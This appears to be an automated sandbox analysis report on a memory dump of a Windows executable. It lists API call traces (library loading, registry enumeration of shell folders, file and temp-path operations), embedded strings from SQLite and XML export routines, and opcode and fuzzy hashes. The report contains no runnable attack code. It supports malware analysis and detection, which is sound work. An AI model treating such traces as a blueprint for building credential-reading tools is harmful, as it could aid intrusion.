                                                                                                                                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: advapi32.dll
                                                                                                                                                                                    • API String ID: 2012295524-4050573280
                                                                                                                                                                                    • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                    • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                    • <%s>, xrefs: 004100A6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                    • API String ID: 3473751417-2880344631
                                                                                                                                                                                    • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                    • API String ID: 2521778956-791839006
                                                                                                                                                                                    • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                    • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                    • API String ID: 999028693-502967061
                                                                                                                                                                                    • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                    • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                      • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                    • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memsetstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2350177629-0
• Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
• Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
• Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
• Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
APIs
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset
• String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• API String ID: 2221118986-1606337402
• Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
• Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
• Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
• Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
APIs
• _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
• memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
• memset.MSVCRT ref: 00408FD4
• memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
• memset.MSVCRT ref: 00409042
• memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
  • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcmpmemset$_mbscpymemcpystrlen
• String ID:
• API String ID: 265355444-0
• Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
• Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
• Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
• Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
APIs
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
• memset.MSVCRT ref: 0040C439
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
• _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
• memset.MSVCRT ref: 0040C4D0
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
• String ID:
• API String ID: 4131475296-0
• Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
• Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
• Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
• Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
APIs
• memset.MSVCRT ref: 004116FF
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2618321458-3614832568
• Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
• Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
• Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
• Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
APIs
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: AttributesFilefreememset
• String ID:
• API String ID: 2507021081-0
• Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
• Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
• Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
• Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
APIs
• AreFileApisANSI.KERNEL32 ref: 004174FC
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
• malloc.MSVCRT ref: 00417524
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
• free.MSVCRT ref: 00417544
• free.MSVCRT ref: 00417562
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: ByteCharMultiWidefree$ApisFilemalloc
• String ID:
• API String ID: 4131324427-0
• Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
• Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
• Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
• Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
APIs
• GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
• GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
• free.MSVCRT ref: 0041822B
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: PathTemp$free
• String ID: %s\etilqs_$etilqs_
• API String ID: 924794160-1420421710
• Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
• Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
• Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
• Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
APIs
• memset.MSVCRT ref: 0040FDD5
  • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,<,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                    • API String ID: 1775345501-2769808009
                                                                                                                                                                                    • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                    • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                    • String ID: General
                                                                                                                                                                                    • API String ID: 999786162-26480598
                                                                                                                                                                                    • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                                                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                    • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                                                    • API String ID: 313946961-1552265934
                                                                                                                                                                                    • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                    • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                                                                                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                    • API String ID: 0-1953309616
                                                                                                                                                                                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                    • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                                                                                                    • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
